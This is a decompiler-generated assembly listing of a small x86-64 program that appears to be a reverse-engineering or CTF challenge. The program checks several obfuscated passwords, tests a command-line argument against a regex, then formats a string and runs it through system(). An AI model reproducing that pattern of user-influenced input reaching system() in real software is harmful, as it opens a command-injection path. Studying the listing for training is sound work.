;;
;; This file was generated by the Retargetable Decompiler
;; Website: https://retdec.com
;; Copyright (c) 2020 Retargetable Decompiler <info@retdec.com>
;;
;; Decompilation date: 2020-05-01 23:21:23
;; Architecture: x86-64
;;

;;
;; Code Segment
;;

; section: .init
; function: function_8b8 at 0x8b8 -- 0x8cf
0x8b8:      48 83 ec 08                  	sub rsp, 8
0x8bc:      48 8b 05 25 17 20 00         	mov rax, qword ptr [rip + 0x201725]
0x8c3:      48 85 c0                     	test rax, rax
0x8c6:      74 02                        	je 0x8ca <function_8b8+0x12>
0x8c8:      ff d0                        	call rax <__gmon_start__>
0x8ca:      48 83 c4 08                  	add rsp, 8
0x8ce:      c3                           	ret 
; section: .plt
; data inside code section at 0x8d0 -- 0x8e0
0x8d0:      ff 35 8a 16 20 00 ff 25  8c 16 20 00 0f 1f 40 00   |.5.. ..%.. ...@.|
; function: function_8e0 at 0x8e0 -- 0x8e6
0x8e0:      ff 25 8a 16 20 00            	jmp qword ptr [rip + 0x20168a] <puts>
; data inside code section at 0x8e6 -- 0x8f0
0x8e6:      68 00 00 00 00 e9 e0 ff  ff ff                     |h.........      |
; function: function_8f0 at 0x8f0 -- 0x8f6
0x8f0:      ff 25 82 16 20 00            	jmp qword ptr [rip + 0x201682] <regfree>
; data inside code section at 0x8f6 -- 0x900
0x8f6:      68 01 00 00 00 e9 d0 ff  ff ff                     |h.........      |
; function: function_900 at 0x900 -- 0x906
0x900:      ff 25 7a 16 20 00            	jmp qword ptr [rip + 0x20167a] <__stack_chk_fail>
; data inside code section at 0x906 -- 0x910
0x906:      68 02 00 00 00 e9 c0 ff  ff ff                     |h.........      |
; function: function_910 at 0x910 -- 0x916
0x910:      ff 25 72 16 20 00            	jmp qword ptr [rip + 0x201672] <system>
; data inside code section at 0x916 -- 0x920
0x916:      68 03 00 00 00 e9 b0 ff  ff ff                     |h.........      |
; function: function_920 at 0x920 -- 0x926
0x920:      ff 25 6a 16 20 00            	jmp qword ptr [rip + 0x20166a] <regcomp>
; data inside code section at 0x926 -- 0x930
0x926:      68 04 00 00 00 e9 a0 ff  ff ff                     |h.........      |
; function: function_930 at 0x930 -- 0x936
0x930:      ff 25 62 16 20 00            	jmp qword ptr [rip + 0x201662] <fgets>
; data inside code section at 0x936 -- 0x940
0x936:      68 05 00 00 00 e9 90 ff  ff ff                     |h.........      |
; function: function_940 at 0x940 -- 0x946
0x940:      ff 25 5a 16 20 00            	jmp qword ptr [rip + 0x20165a] <sscanf>
; data inside code section at 0x946 -- 0x950
0x946:      68 06 00 00 00 e9 80 ff  ff ff                     |h.........      |
; function: function_950 at 0x950 -- 0x956
0x950:      ff 25 52 16 20 00            	jmp qword ptr [rip + 0x201652] <regexec>
; data inside code section at 0x956 -- 0x960
0x956:      68 07 00 00 00 e9 70 ff  ff ff                     |h.....p...      |
; function: function_960 at 0x960 -- 0x966
0x960:      ff 25 4a 16 20 00            	jmp qword ptr [rip + 0x20164a] <__strncpy_chk>
; data inside code section at 0x966 -- 0x970
0x966:      68 08 00 00 00 e9 60 ff  ff ff                     |h.....`...      |
; function: function_970 at 0x970 -- 0x976
0x970:      ff 25 42 16 20 00            	jmp qword ptr [rip + 0x201642] <__printf_chk>
; data inside code section at 0x976 -- 0x980
0x976:      68 09 00 00 00 e9 50 ff  ff ff                     |h.....P...      |
; function: function_980 at 0x980 -- 0x986
0x980:      ff 25 3a 16 20 00            	jmp qword ptr [rip + 0x20163a] <exit>
; data inside code section at 0x986 -- 0x990
0x986:      68 0a 00 00 00 e9 40 ff  ff ff                     |h.....@...      |
; function: function_990 at 0x990 -- 0x996
0x990:      ff 25 32 16 20 00            	jmp qword ptr [rip + 0x201632] <fwrite>
; data inside code section at 0x996 -- 0x9a0
0x996:      68 0b 00 00 00 e9 30 ff  ff ff                     |h.....0...      |
; function: function_9a0 at 0x9a0 -- 0x9a6
0x9a0:      ff 25 2a 16 20 00            	jmp qword ptr [rip + 0x20162a] <__sprintf_chk>
; data inside code section at 0x9a6 -- 0x9b0
0x9a6:      68 0c 00 00 00 e9 20 ff  ff ff                     |h..... ...      |
; section: .plt.got
; function: function_9b0 at 0x9b0 -- 0x9b6
0x9b0:      ff 25 42 16 20 00            	jmp qword ptr [rip + 0x201642] <__cxa_finalize>
; data inside code section at 0x9b6 -- 0x9b8
0x9b6:      66 90                                              |f.              |
; section: .text
; function: entry_point at 0x9c0 -- 0x9eb
0x9c0:      31 ed                        	xor ebp, ebp
0x9c2:      49 89 d1                     	mov r9, rdx
0x9c5:      5e                           	pop rsi
0x9c6:      48 89 e2                     	mov rdx, rsp
0x9c9:      48 83 e4 f0                  	and rsp, 0xfffffffffffffff0
0x9cd:      50                           	push rax
0x9ce:      54                           	push rsp
0x9cf:      4c 8d 05 2a 06 00 00         	lea r8, [rip + 0x62a]
0x9d6:      48 8d 0d b3 05 00 00         	lea rcx, [rip + 0x5b3]
0x9dd:      48 8d 3d 91 04 00 00         	lea rdi, [rip + 0x491]
0x9e4:      ff 15 f6 15 20 00            	call qword ptr [rip + 0x2015f6] <__libc_start_main>
0x9ea:      f4                           	hlt 
; data inside code section at 0x9eb -- 0x9f0
0x9eb:      0f 1f 44 00 00                                     |..D..           |
; function: function_9f0 at 0x9f0 -- 0xa22
0x9f0:      48 8d 3d 19 20 20 00         	lea rdi, [rip + 0x202019]
0x9f7:      55                           	push rbp
0x9f8:      48 8d 05 11 20 20 00         	lea rax, [rip + 0x202011]
0x9ff:      48 39 f8                     	cmp rax, rdi
0xa02:      48 89 e5                     	mov rbp, rsp
0xa05:      74 19                        	je 0xa20 <function_9f0+0x30>
0xa07:      48 8b 05 ca 15 20 00         	mov rax, qword ptr [rip + 0x2015ca]
0xa0e:      48 85 c0                     	test rax, rax
0xa11:      74 0d                        	je 0xa20 <function_9f0+0x30>
0xa13:      5d                           	pop rbp
0xa14:      ff e0                        	jmp rax <_ITM_deregisterTMCloneTable>
; data inside code section at 0xa16 -- 0xa20
0xa16:      66 2e 0f 1f 84 00 00 00  00 00                     |f.........      |
0xa20:      5d                           	pop rbp
0xa21:      c3                           	ret 
; data inside code section at 0xa22 -- 0xa30
0xa22:      0f 1f 40 00 66 2e 0f 1f  84 00 00 00 00 00         |..@.f.........  |
; function: function_a30 at 0xa30 -- 0xa72
0xa30:      48 8d 3d d9 1f 20 00         	lea rdi, [rip + 0x201fd9]
0xa37:      48 8d 35 d2 1f 20 00         	lea rsi, [rip + 0x201fd2]
0xa3e:      55                           	push rbp
0xa3f:      48 29 fe                     	sub rsi, rdi
0xa42:      48 89 e5                     	mov rbp, rsp
0xa45:      48 c1 fe 03                  	sar rsi, 3
0xa49:      48 89 f0                     	mov rax, rsi
0xa4c:      48 c1 e8 3f                  	shr rax, 0x3f
0xa50:      48 01 c6                     	add rsi, rax
0xa53:      48 d1 fe                     	sar rsi, 1
0xa56:      74 18                        	je 0xa70 <function_a30+0x40>
0xa58:      48 8b 05 91 15 20 00         	mov rax, qword ptr [rip + 0x201591]
0xa5f:      48 85 c0                     	test rax, rax
0xa62:      74 0c                        	je 0xa70 <function_a30+0x40>
0xa64:      5d                           	pop rbp
0xa65:      ff e0                        	jmp rax <_ITM_registerTMCloneTable>
; data inside code section at 0xa67 -- 0xa70
0xa67:      66 0f 1f 84 00 00 00 00  00                        |f........       |
0xa70:      5d                           	pop rbp
0xa71:      c3                           	ret 
; data inside code section at 0xa72 -- 0xa80
0xa72:      0f 1f 40 00 66 2e 0f 1f  84 00 00 00 00 00         |..@.f.........  |
; function: function_a80 at 0xa80 -- 0xaba
0xa80:      80 3d c1 1f 20 00 00         	cmp byte ptr [rip + 0x201fc1], 0
0xa87:      75 2f                        	jne 0xab8 <function_a80+0x38>
0xa89:      48 83 3d 67 15 20 00 00      	cmp qword ptr [rip + 0x201567], 0
0xa91:      55                           	push rbp
0xa92:      48 89 e5                     	mov rbp, rsp
0xa95:      74 0c                        	je 0xaa3 <function_a80+0x23>
0xa97:      48 8b 3d 6a 15 20 00         	mov rdi, qword ptr [rip + 0x20156a]
0xa9e:      e8 0d ff ff ff               	call 0x9b0 <__cxa_finalize>
0xaa3:      e8 48 ff ff ff               	call 0x9f0 <function_9f0>
0xaa8:      c6 05 99 1f 20 00 01         	mov byte ptr [rip + 0x201f99], 1
0xaaf:      5d                           	pop rbp
0xab0:      c3                           	ret 
; data inside code section at 0xab1 -- 0xab8
0xab1:      0f 1f 80 00 00 00 00                               |.......         |
0xab8:      f3 c3                        	ret 
; data inside code section at 0xaba -- 0xac0
0xaba:      66 0f 1f 44 00 00                                  |f..D..          |
; function: function_ac0 at 0xac0 -- 0xaca
0xac0:      55                           	push rbp
0xac1:      48 89 e5                     	mov rbp, rsp
0xac4:      5d                           	pop rbp
0xac5:      e9 66 ff ff ff               	jmp 0xa30 <function_a30>
; function: function_aca at 0xaca -- 0xdea
0xaca:      53                           	push rbx
0xacb:      48 83 ec 70                  	sub rsp, 0x70
0xacf:      64 48 8b 04 25 28 00 00 00   	mov rax, qword ptr fs:[0x28]
0xad8:      48 89 44 24 68               	mov qword ptr [rsp + 0x68], rax
0xadd:      31 c0                        	xor eax, eax
0xadf:      48 8d 35 2e 05 00 00         	lea rsi, [rip + 0x52e]
0xae6:      bf 01 00 00 00               	mov edi, 1
0xaeb:      e8 80 fe ff ff               	call 0x970 <__printf_chk>
0xaf0:      48 8b 15 29 1f 20 00         	mov rdx, qword ptr [rip + 0x201f29]
0xaf7:      be 64 00 00 00               	mov esi, 0x64
0xafc:      48 8d 3d bd 1f 20 00         	lea rdi, [rip + 0x201fbd]
0xb03:      e8 28 fe ff ff               	call 0x930 <fgets>
0xb08:      48 89 e3                     	mov rbx, rsp
0xb0b:      48 89 da                     	mov rdx, rbx
0xb0e:      48 8d 35 16 05 00 00         	lea rsi, [rip + 0x516]
0xb15:      48 8d 3d a4 1f 20 00         	lea rdi, [rip + 0x201fa4]
0xb1c:      b8 00 00 00 00               	mov eax, 0
0xb21:      e8 1a fe ff ff               	call 0x940 <sscanf>
0xb26:      48 c7 c1 ff ff ff ff         	mov rcx, -1
0xb2d:      b8 00 00 00 00               	mov eax, 0
0xb32:      48 89 df                     	mov rdi, rbx
0xb35:      f2 ae                        	repne scasb al, byte ptr [rdi]
0xb37:      48 89 cb                     	mov rbx, rcx
0xb3a:      48 f7 d3                     	not rbx
0xb3d:      c6 44 1c ff 00               	mov byte ptr [rsp + rbx - 1], 0
0xb42:      0f bf 05 9b 1e 20 00         	movsx eax, word ptr [rip + 0x201e9b]
0xb49:      0f be 0c 24                  	movsx ecx, byte ptr [rsp]
0xb4d:      8d 90 4f ff ff ff            	lea edx, [rax - 0xb1]
0xb53:      41 ba 00 00 00 00            	mov r10d, 0
0xb59:      39 d1                        	cmp ecx, edx
0xb5b:      74 1d                        	je 0xb7a <function_aca+0xb0>
0xb5d:      ba 00 00 00 00               	mov edx, 0
0xb62:      48 89 e6                     	mov rsi, rsp
0xb65:      49 c7 c0 ff ff ff ff         	mov r8, -1
0xb6c:      b8 00 00 00 00               	mov eax, 0
0xb71:      4c 8d 0d 78 1e 20 00         	lea r9, [rip + 0x201e78]
0xb78:      eb 46                        	jmp 0xbc0 <function_aca+0xf6>
0xb7a:      80 7c 24 04 25               	cmp byte ptr [rsp + 4], 0x25
0xb7f:      75 dc                        	jne 0xb5d <function_aca+0x93>
0xb81:      80 7c 24 05 00               	cmp byte ptr [rsp + 5], 0
0xb86:      75 d5                        	jne 0xb5d <function_aca+0x93>
0xb88:      0f be 4c 24 03               	movsx ecx, byte ptr [rsp + 3]
0xb8d:      8d 90 4b ff ff ff            	lea edx, [rax - 0xb5]
0xb93:      39 d1                        	cmp ecx, edx
0xb95:      75 c6                        	jne 0xb5d <function_aca+0x93>
0xb97:      80 7c 24 01 36               	cmp byte ptr [rsp + 1], 0x36
0xb9c:      75 bf                        	jne 0xb5d <function_aca+0x93>
0xb9e:      0f be 54 24 02               	movsx edx, byte ptr [rsp + 2]
0xba3:      2d dc 00 00 00               	sub eax, 0xdc
0xba8:      39 c2                        	cmp edx, eax
0xbaa:      41 0f 94 c2                  	sete r10b
0xbae:      45 0f b6 d2                  	movzx r10d, r10b
0xbb2:      eb a9                        	jmp 0xb5d <function_aca+0x93>
0xbb4:      0f b6 0c 32                  	movzx ecx, byte ptr [rdx + rsi]
0xbb8:      41 88 0c 11                  	mov byte ptr [r9 + rdx], cl
0xbbc:      48 83 c2 01                  	add rdx, 1
0xbc0:      4c 89 c1                     	mov rcx, r8
0xbc3:      48 89 f7                     	mov rdi, rsi
0xbc6:      f2 ae                        	repne scasb al, byte ptr [rdi]
0xbc8:      48 f7 d1                     	not rcx
0xbcb:      48 83 e9 01                  	sub rcx, 1
0xbcf:      48 39 d1                     	cmp rcx, rdx
0xbd2:      77 e0                        	ja 0xbb4 <function_aca+0xea>
0xbd4:      41 0f bf c2                  	movsx eax, r10w
0xbd8:      48 8b 5c 24 68               	mov rbx, qword ptr [rsp + 0x68]
0xbdd:      64 48 33 1c 25 28 00 00 00   	xor rbx, qword ptr fs:[0x28]
0xbe6:      75 06                        	jne 0xbee <function_aca+0x124>
0xbe8:      48 83 c4 70                  	add rsp, 0x70
0xbec:      5b                           	pop rbx
0xbed:      c3                           	ret 
0xbee:      e8 0d fd ff ff               	call 0x900 <__stack_chk_fail>
0xbf3:      53                           	push rbx
0xbf4:      48 83 ec 70                  	sub rsp, 0x70
0xbf8:      64 48 8b 04 25 28 00 00 00   	mov rax, qword ptr fs:[0x28]
0xc01:      48 89 44 24 68               	mov qword ptr [rsp + 0x68], rax
0xc06:      31 c0                        	xor eax, eax
0xc08:      48 8d 35 1f 04 00 00         	lea rsi, [rip + 0x41f]
0xc0f:      bf 01 00 00 00               	mov edi, 1
0xc14:      e8 57 fd ff ff               	call 0x970 <__printf_chk>
0xc19:      48 8b 15 00 1e 20 00         	mov rdx, qword ptr [rip + 0x201e00]
0xc20:      be 64 00 00 00               	mov esi, 0x64
0xc25:      48 8d 3d 94 1e 20 00         	lea rdi, [rip + 0x201e94]
0xc2c:      e8 ff fc ff ff               	call 0x930 <fgets>
0xc31:      48 89 e3                     	mov rbx, rsp
0xc34:      48 89 da                     	mov rdx, rbx
0xc37:      48 8d 35 ed 03 00 00         	lea rsi, [rip + 0x3ed]
0xc3e:      48 8d 3d 7b 1e 20 00         	lea rdi, [rip + 0x201e7b]
0xc45:      b8 00 00 00 00               	mov eax, 0
0xc4a:      e8 f1 fc ff ff               	call 0x940 <sscanf>
0xc4f:      48 c7 c2 ff ff ff ff         	mov rdx, -1
0xc56:      b8 00 00 00 00               	mov eax, 0
0xc5b:      48 89 d1                     	mov rcx, rdx
0xc5e:      48 89 df                     	mov rdi, rbx
0xc61:      f2 ae                        	repne scasb al, byte ptr [rdi]
0xc63:      48 f7 d1                     	not rcx
0xc66:      c6 44 0c ff 00               	mov byte ptr [rsp + rcx - 1], 0
0xc6b:      48 89 d1                     	mov rcx, rdx
0xc6e:      48 89 df                     	mov rdi, rbx
0xc71:      f2 ae                        	repne scasb al, byte ptr [rdi]
0xc73:      48 89 c8                     	mov rax, rcx
0xc76:      48 f7 d0                     	not rax
0xc79:      48 01 c2                     	add rdx, rax
0xc7c:      48 89 d9                     	mov rcx, rbx
0xc7f:      48 8d 3c 13                  	lea rdi, [rbx + rdx]
0xc83:      bb 00 00 00 00               	mov ebx, 0
0xc88:      eb 09                        	jmp 0xc93 <function_aca+0x1c9>
0xc8a:      0f be 01                     	movsx eax, byte ptr [rcx]
0xc8d:      01 c3                        	add ebx, eax
0xc8f:      48 83 c1 01                  	add rcx, 1
0xc93:      48 39 f9                     	cmp rcx, rdi
0xc96:      75 f2                        	jne 0xc8a <function_aca+0x1c0>
0xc98:      48 63 c3                     	movsxd rax, ebx
0xc9b:      48 8d 04 80                  	lea rax, [rax + rax*4]
0xc9f:      48 8d 0c 80                  	lea rcx, [rax + rax*4]
0xca3:      48 8d 05 76 13 20 00         	lea rax, [rip + 0x201376]
0xcaa:      48 8d 34 48                  	lea rsi, [rax + rcx*2]
0xcae:      b9 0b 00 00 00               	mov ecx, 0xb
0xcb3:      48 8d 3d 3b 1d 20 00         	lea rdi, [rip + 0x201d3b]
0xcba:      e8 a1 fc ff ff               	call 0x960 <__strncpy_chk>
0xcbf:      8d 43 17                     	lea eax, [rbx + 0x17]
0xcc2:      48 8b 74 24 68               	mov rsi, qword ptr [rsp + 0x68]
0xcc7:      64 48 33 34 25 28 00 00 00   	xor rsi, qword ptr fs:[0x28]
0xcd0:      75 06                        	jne 0xcd8 <function_aca+0x20e>
0xcd2:      48 83 c4 70                  	add rsp, 0x70
0xcd6:      5b                           	pop rbx
0xcd7:      c3                           	ret 
0xcd8:      e8 23 fc ff ff               	call 0x900 <__stack_chk_fail>
0xcdd:      48 83 ec 28                  	sub rsp, 0x28
0xce1:      64 48 8b 04 25 28 00 00 00   	mov rax, qword ptr fs:[0x28]
0xcea:      48 89 44 24 18               	mov qword ptr [rsp + 0x18], rax
0xcef:      31 c0                        	xor eax, eax
0xcf1:      48 8d 35 4d 03 00 00         	lea rsi, [rip + 0x34d]
0xcf8:      bf 01 00 00 00               	mov edi, 1
0xcfd:      e8 6e fc ff ff               	call 0x970 <__printf_chk>
0xd02:      48 8b 15 17 1d 20 00         	mov rdx, qword ptr [rip + 0x201d17]
0xd09:      be 64 00 00 00               	mov esi, 0x64
0xd0e:      48 8d 3d ab 1d 20 00         	lea rdi, [rip + 0x201dab]
0xd15:      e8 16 fc ff ff               	call 0x930 <fgets>
0xd1a:      48 8d 4c 24 0c               	lea rcx, [rsp + 0xc]
0xd1f:      48 8d 54 24 08               	lea rdx, [rsp + 8]
0xd24:      4c 8d 4c 24 14               	lea r9, [rsp + 0x14]
0xd29:      4c 8d 44 24 10               	lea r8, [rsp + 0x10]
0xd2e:      48 8d 35 27 03 00 00         	lea rsi, [rip + 0x327]
0xd35:      48 8d 3d 84 1d 20 00         	lea rdi, [rip + 0x201d84]
0xd3c:      b8 00 00 00 00               	mov eax, 0
0xd41:      e8 fa fb ff ff               	call 0x940 <sscanf>
0xd46:      8b 44 24 08                  	mov eax, dword ptr [rsp + 8]
0xd4a:      8d 04 80                     	lea eax, [rax + rax*4]
0xd4d:      01 c0                        	add eax, eax
0xd4f:      89 44 24 08                  	mov dword ptr [rsp + 8], eax
0xd53:      8b 54 24 10                  	mov edx, dword ptr [rsp + 0x10]
0xd57:      8d 0c 92                     	lea ecx, [rdx + rdx*4]
0xd5a:      01 c9                        	add ecx, ecx
0xd5c:      89 4c 24 10                  	mov dword ptr [rsp + 0x10], ecx
0xd60:      03 44 24 0c                  	add eax, dword ptr [rsp + 0xc]
0xd64:      89 c2                        	mov edx, eax
0xd66:      b8 00 00 00 00               	mov eax, 0
0xd6b:      83 fa 0d                     	cmp edx, 0xd
0xd6e:      74 15                        	je 0xd85 <function_aca+0x2bb>
0xd70:      48 8b 7c 24 18               	mov rdi, qword ptr [rsp + 0x18]
0xd75:      64 48 33 3c 25 28 00 00 00   	xor rdi, qword ptr fs:[0x28]
0xd7e:      75 43                        	jne 0xdc3 <function_aca+0x2f9>
0xd80:      48 83 c4 28                  	add rsp, 0x28
0xd84:      c3                           	ret 
0xd85:      03 4c 24 14                  	add ecx, dword ptr [rsp + 0x14]
0xd89:      83 f9 25                     	cmp ecx, 0x25
0xd8c:      75 e2                        	jne 0xd70 <function_aca+0x2a6>
0xd8e:      48 8d 35 c5 19 20 00         	lea rsi, [rip + 0x2019c5]
0xd95:      48 c7 c1 ff ff ff ff         	mov rcx, -1
0xd9c:      48 89 f7                     	mov rdi, rsi
0xd9f:      f2 ae                        	repne scasb al, byte ptr [rdi]
0xda1:      48 89 ca                     	mov rdx, rcx
0xda4:      48 f7 d2                     	not rdx
0xda7:      48 8d 52 ff                  	lea rdx, [rdx - 1]
0xdab:      b9 06 00 00 00               	mov ecx, 6
0xdb0:      48 8d 3d 43 1c 20 00         	lea rdi, [rip + 0x201c43]
0xdb7:      e8 a4 fb ff ff               	call 0x960 <__strncpy_chk>
0xdbc:      b8 01 00 00 00               	mov eax, 1
0xdc1:      eb ad                        	jmp 0xd70 <function_aca+0x2a6>
0xdc3:      e8 38 fb ff ff               	call 0x900 <__stack_chk_fail>
0xdc8:      48 83 ec 08                  	sub rsp, 8
0xdcc:      48 8b 17                     	mov rdx, qword ptr [rdi]
0xdcf:      48 8d 35 c2 02 00 00         	lea rsi, [rip + 0x2c2]
0xdd6:      bf 01 00 00 00               	mov edi, 1
0xddb:      b8 00 00 00 00               	mov eax, 0
0xde0:      e8 8b fb ff ff               	call 0x970 <__printf_chk>
0xde5:      48 83 c4 08                  	add rsp, 8
0xde9:      c3                           	ret 
; function: function_dea at 0xdea -- 0xe75
0xdea:      53                           	push rbx
0xdeb:      48 89 fb                     	mov rbx, rdi
0xdee:      ba 00 00 00 00               	mov edx, 0
0xdf3:      48 8b 35 06 1c 20 00         	mov rsi, qword ptr [rip + 0x201c06]
0xdfa:      48 8d 3d 5f 1c 20 00         	lea rdi, [rip + 0x201c5f]
0xe01:      e8 1a fb ff ff               	call 0x920 <regcomp>
0xe06:      89 05 94 1c 20 00            	mov dword ptr [rip + 0x201c94], eax
0xe0c:      85 c0                        	test eax, eax
0xe0e:      75 3e                        	jne 0xe4e <function_dea+0x64>
0xe10:      48 8b 73 08                  	mov rsi, qword ptr [rbx + 8]
0xe14:      41 b8 00 00 00 00            	mov r8d, 0
0xe1a:      b9 00 00 00 00               	mov ecx, 0
0xe1f:      ba 00 00 00 00               	mov edx, 0
0xe24:      48 8d 3d 35 1c 20 00         	lea rdi, [rip + 0x201c35]
0xe2b:      e8 20 fb ff ff               	call 0x950 <regexec>
0xe30:      89 c3                        	mov ebx, eax
0xe32:      89 05 68 1c 20 00            	mov dword ptr [rip + 0x201c68], eax
0xe38:      48 8d 3d 21 1c 20 00         	lea rdi, [rip + 0x201c21]
0xe3f:      e8 ac fa ff ff               	call 0x8f0 <regfree>
0xe44:      85 db                        	test ebx, ebx
0xe46:      0f 95 c0                     	setne al
0xe49:      0f b6 c0                     	movzx eax, al
0xe4c:      5b                           	pop rbx
0xe4d:      c3                           	ret 
0xe4e:      48 8b 0d eb 1b 20 00         	mov rcx, qword ptr [rip + 0x201beb]
0xe55:      ba 18 00 00 00               	mov edx, 0x18
0xe5a:      be 01 00 00 00               	mov esi, 1
0xe5f:      48 8d 3d 02 02 00 00         	lea rdi, [rip + 0x202]
0xe66:      e8 25 fb ff ff               	call 0x990 <fwrite>
0xe6b:      bf 01 00 00 00               	mov edi, 1
0xe70:      e8 0b fb ff ff               	call 0x980 <exit>
; function: function_e75 at 0xe75 -- 0xff5
0xe75:      55                           	push rbp
0xe76:      53                           	push rbx
0xe77:      48 83 ec 78                  	sub rsp, 0x78
0xe7b:      48 89 f3                     	mov rbx, rsi
0xe7e:      64 48 8b 04 25 28 00 00 00   	mov rax, qword ptr fs:[0x28]
0xe87:      48 89 44 24 68               	mov qword ptr [rsp + 0x68], rax
0xe8c:      31 c0                        	xor eax, eax
0xe8e:      83 ff 02                     	cmp edi, 2
0xe91:      74 28                        	je 0xebb <function_e75+0x46>
0xe93:      48 89 df                     	mov rdi, rbx
0xe96:      e8 2d ff ff ff               	call 0xdc8
0xe9b:      b8 00 00 00 00               	mov eax, 0
0xea0:      48 8b 4c 24 68               	mov rcx, qword ptr [rsp + 0x68]
0xea5:      64 48 33 0c 25 28 00 00 00   	xor rcx, qword ptr fs:[0x28]
0xeae:      0f 85 d3 00 00 00            	jne 0xf87 <function_e75+0x112>
0xeb4:      48 83 c4 78                  	add rsp, 0x78
0xeb8:      5b                           	pop rbx
0xeb9:      5d                           	pop rbp
0xeba:      c3                           	ret 
0xebb:      48 89 f7                     	mov rdi, rsi
0xebe:      e8 27 ff ff ff               	call 0xdea <function_dea>
0xec3:      85 c0                        	test eax, eax
0xec5:      75 cc                        	jne 0xe93 <function_e75+0x1e>
0xec7:      b8 00 00 00 00               	mov eax, 0
0xecc:      e8 f9 fb ff ff               	call 0xaca <function_aca>
0xed1:      85 c0                        	test eax, eax
0xed3:      74 0f                        	je 0xee4 <function_e75+0x6f>
0xed5:      b8 00 00 00 00               	mov eax, 0
0xeda:      e8 14 fd ff ff               	call 0xbf3
0xedf:      83 f8 2a                     	cmp eax, 0x2a
0xee2:      74 0e                        	je 0xef2 <function_e75+0x7d>
0xee4:      48 8d 3d bd 02 00 00         	lea rdi, [rip + 0x2bd]
0xeeb:      e8 f0 f9 ff ff               	call 0x8e0 <puts>
0xef0:      eb a9                        	jmp 0xe9b <function_e75+0x26>
0xef2:      b8 00 00 00 00               	mov eax, 0
0xef7:      e8 e1 fd ff ff               	call 0xcdd
0xefc:      83 f8 01                     	cmp eax, 1
0xeff:      75 e3                        	jne 0xee4 <function_e75+0x6f>
0xf01:      48 89 e5                     	mov rbp, rsp
0xf04:      48 8b 7b 08                  	mov rdi, qword ptr [rbx + 8]
0xf08:      48 89 ea                     	mov rdx, rbp
0xf0b:      48 8d 35 19 01 00 00         	lea rsi, [rip + 0x119]
0xf12:      b8 00 00 00 00               	mov eax, 0
0xf17:      e8 24 fa ff ff               	call 0x940 <sscanf>
0xf1c:      4c 8b 0d e5 1a 20 00         	mov r9, qword ptr [rip + 0x201ae5]
0xf23:      41 51                        	push r9
0xf25:      55                           	push rbp
0xf26:      4c 8d 05 c3 1a 20 00         	lea r8, [rip + 0x201ac3]
0xf2d:      48 8d 0d fc 01 00 00         	lea rcx, [rip + 0x1fc]
0xf34:      48 c7 c2 ff ff ff ff         	mov rdx, -1
0xf3b:      be 01 00 00 00               	mov esi, 1
0xf40:      bb 00 00 00 00               	mov ebx, 0
0xf45:      48 89 df                     	mov rdi, rbx
0xf48:      b8 00 00 00 00               	mov eax, 0
0xf4d:      e8 4e fa ff ff               	call 0x9a0 <__sprintf_chk>
0xf52:      48 8d 3d 34 01 00 00         	lea rdi, [rip + 0x134]
0xf59:      e8 82 f9 ff ff               	call 0x8e0 <puts>
0xf5e:      48 89 df                     	mov rdi, rbx
0xf61:      e8 aa f9 ff ff               	call 0x910 <system>
0xf66:      89 c2                        	mov edx, eax
0xf68:      48 8d 35 12 01 00 00         	lea rsi, [rip + 0x112]
0xf6f:      bf 01 00 00 00               	mov edi, 1
0xf74:      b8 00 00 00 00               	mov eax, 0
0xf79:      e8 f2 f9 ff ff               	call 0x970 <__printf_chk>
0xf7e:      48 83 c4 10                  	add rsp, 0x10
0xf82:      e9 14 ff ff ff               	jmp 0xe9b <function_e75+0x26>
0xf87:      e8 74 f9 ff ff               	call 0x900 <__stack_chk_fail>
0xf8c:      0f 1f 40 00                  	nop dword ptr [rax]
0xf90:      41 57                        	push r15
0xf92:      41 56                        	push r14
0xf94:      49 89 d7                     	mov r15, rdx
0xf97:      41 55                        	push r13
0xf99:      41 54                        	push r12
0xf9b:      4c 8d 25 b6 0d 20 00         	lea r12, [rip + 0x200db6]
0xfa2:      55                           	push rbp
0xfa3:      48 8d 2d b6 0d 20 00         	lea rbp, [rip + 0x200db6]
0xfaa:      53                           	push rbx
0xfab:      41 89 fd                     	mov r13d, edi
0xfae:      49 89 f6                     	mov r14, rsi
0xfb1:      4c 29 e5                     	sub rbp, r12
0xfb4:      48 83 ec 08                  	sub rsp, 8
0xfb8:      48 c1 fd 03                  	sar rbp, 3
0xfbc:      e8 f7 f8 ff ff               	call 0x8b8 <function_8b8>
0xfc1:      48 85 ed                     	test rbp, rbp
0xfc4:      74 20                        	je 0xfe6 <function_e75+0x171>
0xfc6:      31 db                        	xor ebx, ebx
0xfc8:      0f 1f 84 00 00 00 00 00      	nop dword ptr [rax + rax]
0xfd0:      4c 89 fa                     	mov rdx, r15
0xfd3:      4c 89 f6                     	mov rsi, r14
0xfd6:      44 89 ef                     	mov edi, r13d
0xfd9:      41 ff 14 dc                  	call qword ptr [r12 + rbx*8]
0xfdd:      48 83 c3 01                  	add rbx, 1
0xfe1:      48 39 dd                     	cmp rbp, rbx
0xfe4:      75 ea                        	jne 0xfd0 <function_e75+0x15b>
0xfe6:      48 83 c4 08                  	add rsp, 8
0xfea:      5b                           	pop rbx
0xfeb:      5d                           	pop rbp
0xfec:      41 5c                        	pop r12
0xfee:      41 5d                        	pop r13
0xff0:      41 5e                        	pop r14
0xff2:      41 5f                        	pop r15
0xff4:      c3                           	ret 
; data inside code section at 0xff5 -- 0x1000
0xff5:      90 66 2e 0f 1f 84 00 00  00 00 00                  |.f.........     |
; function: function_1000 at 0x1000 -- 0x1002
0x1000:     f3 c3                        	ret 
; section: .fini
; function: function_1004 at 0x1004 -- 0x100d
0x1004:     48 83 ec 08                  	sub rsp, 8
0x1008:     48 83 c4 08                  	add rsp, 8
0x100c:     c3                           	ret 

;;
;; Data Segment
;;

; section: .interp
0x238:      2f 6c 69 62 36 34 2f 6c  64 2d 6c 69 6e 75 78 2d   |/lib64/ld-linux-|
0x248:      78 38 36 2d 36 34 2e 73  6f 2e 32 00 04            |x86-64.so.2..   |
; section: .gnu.hash
0x298:      02 00 00 00 13 00 00 00  01 00 00 00 06 00 00 00   |................|
0x2a8:      00 01 20 00 80 00 00 02  00 00 00 00 13 00 00 00   |.. .............|
0x2b8:      66 55 61 10 39 f2 8b 1c  00                        |fUa.9....       |
; section: .dynsym
0x2c0:      00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x2d0:      00 00 00 00 00 00 00 00  e5 00 00 00 20 00 00 00   |............ ...|
0x2e0:      00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x2f0:      35 00 00 00 12 00 00 00  00 00 00 00 00 00 00 00   |5...............|
0x300:      00 00 00 00 00 00 00 00  3a 00 00 00 12 00 00 00   |........:.......|
